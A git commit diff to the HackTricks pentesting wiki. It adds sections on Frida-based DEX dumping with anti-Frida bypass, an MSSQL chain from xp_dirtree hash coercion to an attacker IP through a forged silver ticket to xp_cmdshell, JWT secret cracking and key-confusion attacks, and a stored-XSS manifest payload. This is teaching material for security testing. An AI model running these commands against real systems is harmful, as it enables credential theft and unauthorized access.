Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

carlospolop · carlospolop · commit 06f60e2da5e2 · 2026-02-12T20:51:47.000+01:00
diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
@@ -114,7 +114,7 @@ If the APK is debuggable (android:debuggable="true"), you can attach over JDWP a
 - Repo: https://github.com/frankheat/frida-jdwp-loader
 - Requirements: ADB, Python 3, USB/Wireless debugging. App must be debuggable (emulator with `ro.debuggable=1`, rooted device with `resetprop`, or rebuild manifest).
 
-Quick start
+Quick start:
 ```bash
 git clone https://github.com/frankheat/frida-jdwp-loader.git
 cd frida-jdwp-loader
@@ -285,6 +285,49 @@ Java.perform(function () {
 
 Run the script with `frida -U -f <package> -l disable-flag-secure.js --no-pause`, interact with the UI, and screenshots/recordings will work again. Because everything happens on the UI thread there is no flicker, and you can still combine the hook with HTTP Toolkit/Burp to capture the traffic that revealed the `/channel` PIN leak.
 
+## Dynamic DEX dumping / unpacking with clsdumper (Frida)
+
+`clsdumper` is a Frida-based dynamic **DEX/class dumper** that survives hardened apps by combining an anti-Frida pre-stage with native and Java discovery strategies (works even if `Java.perform()` dies). Requirements: Python 3.10+, rooted device with `frida-server` running, USB or `--host` TCP connection.
+
+**Install & quick use**
+```bash
+pip install clsdumper
+# Attach to a running app
+clsdumper com.example.app
+# Spawn first (hooks before early loaders)
+clsdumper com.example.app --spawn
+# Select strategies
+clsdumper com.example.app --strategies fart_dump,oat_extract
+```
+
+**CLI options (most useful)**
+- `target`: package name or PID.  
+- `--spawn`: spawn instead of attach.  
+- `--host <ip>`: connect to remote frida-server.  
+- `--strategies <comma>`: limit/choose extractors; default is all except `mmap_hook` (expensive).  
+- `--no-scan` / `--deep-scan`: disable or slow deep memory scan (adds CDEX scanning).  
+- `--extract-classes`: post-process dumps into `.smali` via androguard.  
+- `--no-anti-frida`: skip the pre-hook bypass stage.  
+- `--list` / `--list-apps`: enumerate running processes or installed packages.
+
+**Anti-instrumentation bypass (phase 0)**
+- Hooks `sigaction`/`signal` to block registration of crash/anti-debug handlers.  
+- Serves a filtered `/proc/self/maps` via `memfd_create` to hide Frida regions.  
+- Monitors `pthread_create` to catch/neutralize watchdog threads hunting Frida.
+
+**DEX discovery (phases 1–2)** — multiple complementary strategies with per-hit metadata + deduplication (agent-side djb2, host-side SHA-256):
+- Native (no Java bridge needed): `art_walk` (walk ART Runtime→ClassLinker→DexFile), `open_common_hook` (hook `DexFile::OpenCommon`), `memory_scan` (DEX magic in readable maps), `oat_extract` (parse mapped .vdex/.oat), `fart_dump` (hook `DefineClass` + walk `class_table_`), `dexfile_constructor` (hook `OatDexFile` constructors), `mmap_hook` (watch `mmap/mmap64`, off by default for perf).  
+- Java (when available): `cookie` (read `mCookie` from ClassLoaders), `classloader_hook` (monitor `loadClass`, `DexClassLoader`, `InMemoryDexClassLoader`).
+
+**Output layout**
+```
+dump_<target>/
+  dex/classes_001.dex ...
+  classes/                 # only when --extract-classes
+  metadata.json            # strategy per hit + hashes
+```
+
+Tip: protected apps often load code from several sources (in-memory payload, vdex/oat, custom loaders). Running with the default multi-strategy set plus `--spawn` maximizes coverage; enable `--deep-scan` only when needed to avoid performance hits.
 
 ## Tutorials
 
@@ -479,5 +522,6 @@ Java.choose("com.example.a11x256.frida_test.my_activity", {
 - ["Super secure" MAGA-themed messaging app leaks everyone’s phone number](https://ericdaigle.ca/posts/super-secure-maga-messaging-app-leaks-everyones-phone-number/)
 - [Android Frida Hooking: Disabling FLAG_SECURE](https://www.securify.nl/en/blog/android-frida-hooking-disabling-flagsecure/)
 - [frida-ui](https://github.com/adityatelange/frida-ui)
+- [clsdumper — Android Dynamic Class Dumper](https://github.com/TheQmaks/clsdumper)
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -384,6 +384,27 @@ You can see how to use these tools in:
 ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
 {{#endref}}
 
+#### From NetNTLMv2 capture to MSSQL silver ticket (PAC group injection)
+- Capture the SQL Server service account NetNTLMv2 via `xp_dirtree '\\\\<attacker_ip>\\share'` with Responder (Hashcat mode 5600 to crack).
+- Derive the service NTLM hash from the recovered password:
+
+```python
+python3 - <<'PY'
+import hashlib
+print(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).hexdigest())
+PY
+```
+
+- Get the domain SID bytes with `SELECT SUSER_SID('DOMAIN\\Domain Users');` (RID = last 4 bytes, little endian). Map/brute RIDs with `nxc mssql ... --rid-brute` to find a group granting sysadmin (e.g., RID `1105`).
+- Forge a silver ticket for the MSSQL SPN with the privileged group RID injected in the PAC:
+
+```bash
+ticketer.py -nthash <SERVICE_NTLM> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn MSSQLSvc/<fqdn>:1433 -groups <GROUP_RID> <user_to_impersonate>
+KRB5CCNAME=<user_to_impersonate>.ccache mssqlclient.py -no-pass -k <fqdn>
+```
+
+- Enable `xp_cmdshell` if needed; commands run as the SQL Server service account even when impersonating via the forged ticket.
+
 ### Abusing MSSQL trusted Links
 
 [**Read this post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature:**
@@ -710,6 +731,7 @@ You probably will be able to **escalate to Administrator** following one of thes
 ## References
 
 - [Unit 42 – Phantom Taurus: WMI-driven direct SQL collection via batch/sqlcmd](https://unit42.paloaltonetworks.com/phantom-taurus/)
+- [HTB: Signed - MSSQL coercion to silver ticket sysadmin](https://0xdf.gitlab.io/2026/02/07/htb-signed.html)
 - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
 - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
 - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
@@ -721,16 +743,6 @@ You probably will be able to **escalate to Administrator** following one of thes
 - [https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
 
 
-- [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
-- [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
-- [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
-- [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
-- [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
-- [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
-- [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)
-- [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
-- [https://exploit7-tr.translate.goog/posts/sqlserver/?\_x_tr_sl=es&\_x_tr_tl=en&\_x_tr_hl=en&\_x_tr_pto=wapp](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
-
 ## HackTricks Automatic Commands
 
 ```
diff --git a/src/pentesting-web/hacking-jwt-json-web-tokens.md b/src/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -27,6 +27,17 @@ python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"
 
 You can also use the [**Burp Extension SignSaboteur**](https://github.com/d0ge/sign-saboteur) to launch JWT attacks from Burp.
 
+### Practical JWT assessment workflow
+
+- **Scope the session control**: Pick a user-specific request (e.g., profile, billing). Remove cookies/headers one at a time until the request is rejected to isolate which token(s) actually gate authorization.
+- **Locate JWTs in traffic**: They often sit in `Authorization: Bearer <JWT>`, but also appear in custom headers or cookies. If Burp doesn’t highlight them, use Target → Site map → Engagement tools → Search with regex patterns such as:
+  - `[= ]eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9._-]*`
+  - `eyJ[a-zA-Z0-9_-]+?\.[a-zA-Z0-9_-]+?\.[a-zA-Z0-9_-]+`
+  - `[= ]eyJ[A-Za-z0-9_\\/+-]*\.[A-Za-z0-9._\\/+-]*`
+- **Decode and enumerate**: Use Burp **JWT Editor** or `python3 jwt_tool.py <JWT>` to read header/payload. Note `alg`, `exp`/token lifetime, and authn/authz-driving claims (`role`, `id`, `username`, `email`, etc.).
+- **Signature enforcement sanity check**: Flip or delete a few bytes in the signature portion and replay. Acceptance implies missing signature validation and you can directly tamper payload claims.
+- **Goal**: Modify payload claims to escalate privileges; every attack below aims to get the server to accept a tampered payload by abusing weak verification, weak secrets, or unsafe key selection.
+
 ### Tamper data without modifying anything
 
 You can just tamper with the data leaving the signature as is and check if the server is checking the signature. Try to change your username to "admin" for example.
@@ -54,6 +65,15 @@ Check if the token lasts more than 24h... maybe it never expires. If there is a
 
 [**See this page.**](../generic-hacking/brute-force.md#jwt)
 
+If the header uses **HS256**, dump the token to a file and try offline cracking:
+
+```bash
+python3 jwt_tool.py <JWT> -C -d wordlist.txt
+hashcat -a 0 -m 16500 jwt.txt /path/to/wordlist.txt -r /usr/share/hashcat/rules/best64.rule
+```
+
+Once the secret is recovered, load it as a symmetric key in Burp JWT Editor and re-sign modified claims.
+
 ### Derive JWT secrets from leaked config + DB data
 
 If an arbitrary file read (or backup leak) exposes both **application encryption material** and **user records**, you can sometimes recreate the JWT signing secret and forge session cookies without knowing any plaintext passwords. Example pattern observed in workflow automation stacks:
@@ -90,6 +110,8 @@ openssl s_client -connect example.com:443 2>&1 < /dev/null | sed -n '/-----BEGIN
 openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
 ```
 
+Using Burp **JWT Editor**, import the RSA public key (from `/.well-known/jwks.json` or a PEM) and run **Attack → HMAC Key Confusion Attack** to automate the HS256 re-sign attempt.
+
 ### New public key inside the header
 
 An attacker embeds a new key in the header of the token and the server uses this new key to verify the signature (CVE-2018-0114).
@@ -133,6 +155,8 @@ python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
 
 By targeting files with predictable content, it's possible to forge a valid JWT. For instance, the `/proc/sys/kernel/randomize_va_space` file in Linux systems, known to contain the value **2**, can be used in the `kid` parameter with **2** as the symmetric password for JWT generation.
 
+A practical pattern for brittle file-system key loading is to generate an HS256 key with JWK `k` set to `AA==`, set `kid` to a traversal like `../../../../../../../dev/null`, and re-sign—some implementations treat the empty file as a valid HMAC secret and will accept forged tokens.
+
 #### SQL Injection via "kid"
 
 If the `kid` claim's content is employed to fetch a password from a database, an SQL injection could be facilitated by modifying the `kid` payload. An example payload that uses SQL injection to alter the JWT signing process includes:
@@ -175,6 +199,8 @@ print("n:", hex(key.n))
 print("e:", hex(key.e))
 ```
 
+If the verifier fetches key material remotely, embed a Burp Collaborator URL in `jku`/`x5u` using **JWT Editor → Attack → Embed Collaborator payload**. Any callback confirms SSRF-style key retrieval; then host your own JWKS/PEM at that URL and re-sign with your private key so the service validates attacker-minted tokens.
+
 #### x5u
 
 X.509 URL. A URI pointing to a set of X.509 (a certificate format standard) public certificates encoded in PEM form. The first certificate in the set must be the one used to sign this JWT. The subsequent certificates each sign the previous one, thus completing the certificate chain. X.509 is defined in RFC 52807 . Transport security is required to transfer the certificates.
@@ -281,6 +307,10 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are
 
 ### Tools
 
+- [jwt_tool](https://github.com/ticarpi/jwt_tool) – decoding, claim/header tampering, offline secret cracking (`-C`) and semi-automated attack modes (`-M at`).
+- [Burp JWT Editor](https://github.com/PortSwigger/jwt-editor) – decode/re-sign in Repeater, generate custom keys, and run built-in attacks (**none**, **HMAC key confusion**, **embedded JWK**, **jku/x5u collaborator payloads**).
+- [hashcat](https://hashcat.net/hashcat/) `-m 16500` – GPU-accelerated HS256 secret cracking after exporting JWTs to a wordlist.
+
 
 {{#ref}}
 https://github.com/ticarpi/jwt_tool
@@ -289,5 +319,8 @@ https://github.com/ticarpi/jwt_tool
 ## References
 
 - [n8n token forge chain – config+DB leak to JWT signing secret](https://github.com/Chocapikk/CVE-2026-21858)
+- [Burp Suite – JWT Editor extension](https://github.com/PortSwigger/jwt-editor)
+- [jwt_tool attack methodology](https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology)
+- [Keys to JWT Assessments – TrustedSec](https://trustedsec.com/blog/keys-to-jwt-assessments-from-a-cheat-sheet-to-a-deep-dive)
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md
@@ -1673,6 +1673,29 @@ When a backend **builds a shared SDK by concatenating JS strings with user-contr
 - Example pattern (Meta CAPIG): server appends `cbq.config.set("<pixel>","IWLParameters",{params: <user JSON>});` directly into `capig-events.js`.
 - Injecting `'` or `"]}` closes the literal/object and adds attacker JS, creating **stored XSS** in the distributed SDK for every site that loads it (first-party and third-party).
 
+### Stored XSS in generated reports when escaping is disabled
+
+If uploaded files are parsed and their metadata is printed into HTML reports with escaping disabled (`|safe`, custom renderers), that metadata is a **stored XSS sink**. Example flow:
+
+```python
+xmlhost = data.getAttribute(f'{ns}:host')
+ret_list.append(('dialer_code_found', (xmlhost,), ()))
+'title': a_template['title'] % t_name  # %s fed by xmlhost
+```
+
+A Django template renders `{{item|key:"title"|safe}}`, so attacker HTML runs.
+
+**Exploit:** place **entity-encoded HTML** in any manifest/config field that reaches the report:
+
+```xml
+<data android:scheme="android_secret_code"
+      android:host="&lt;img src=x onerror=alert(document.domain)&gt;"/>
+```
+
+Rendered with `|safe`, the report outputs `<img ...>` and fires JS on view.
+
+**Hunting:** look for report/notification builders that reuse parsed fields in `%s`/f-strings and disable auto-escape. One encoded tag in an uploaded manifest/log/archive persists XSS for every viewer.
+
 ### Abusing Service Workers
 
 
@@ -2036,5 +2059,6 @@ other-js-tricks.md
 - [From "Low-Impact" RXSS to Credential Stealer: A JS-in-JS Walkthrough](https://r3verii.github.io/bugbounty/2025/08/25/rxss-credential-stealer.html)
 - [MDN eval()](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval)
 - [CAPIG XSS: postMessage origin trust becomes a script loader + backend JS concatenation enables supply-chain stored XSS](https://ysamm.com/uncategorized/2026/01/13/capig-xss.html)
+- [MobSF stored XSS via manifest analysis (unsafe Django safe sink)](https://github.com/advisories/GHSA-8hf7-h89p-3pqj)
 
 {{#include ../../banners/hacktricks-training.md}}
